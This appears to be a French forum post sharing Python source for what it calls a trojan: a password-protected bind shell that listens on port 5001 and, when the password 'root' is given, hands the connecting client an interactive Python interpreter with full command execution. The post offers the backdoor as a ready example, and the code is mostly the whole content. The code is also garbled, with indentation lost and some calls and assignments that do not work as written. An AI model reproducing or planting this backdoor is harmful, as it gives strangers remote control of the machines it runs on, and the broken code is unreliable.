Simple exemple de troyan codé en Python avec pass.
On s'y connecte simplement par telnet puis on rentre le pass^^ bete ,nan?
[code:1:77cbe20a69]#!/usr/bin/python
# -*- coding: iso8859-1 -*
import socket # importe module socket
port= 5001 # port d'écoute
host='' # pas de client défini
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) # socket basique tcp/ip
s.bind((host,port)) # le socket = lié a l'hote ( ici n'importe lequel)
s.listen(2) # attend les connexions "maximum maxpending" de 2
while 1:
clsock,claddr=s.accept() #accepte la demande de connexion, sinon bloque le script en attente de client
clfile=clsock.makefile('rw',0) # va permettre l'ouverture du prompt python via telnet ou autre client
clfile.write("bonjour, bienvenu vous etes connecté au server /Ctrl-C pour quitter ! "+(claddr)+"\n")
clfile=clsock.write("+ entrer le pass : ") # demande du pass
mot=clfile.readline() # la variable mot stocke les données
if mot =="root\n": # si "mot" == "root"
import code,sys,os # on importe les modules souhaités
for f in range (3):
os.dup2(clfile.fileno(),f) # on peu alors taper (par exemple ^^) un petit "import os → os.system('ls') pour lister les répertoires ( ceci est a titre d'exemple )
code.interact()
sys.exit()
clfile.close()
clsock.close() # fermeture de la socket[/code:1:77cbe20a69]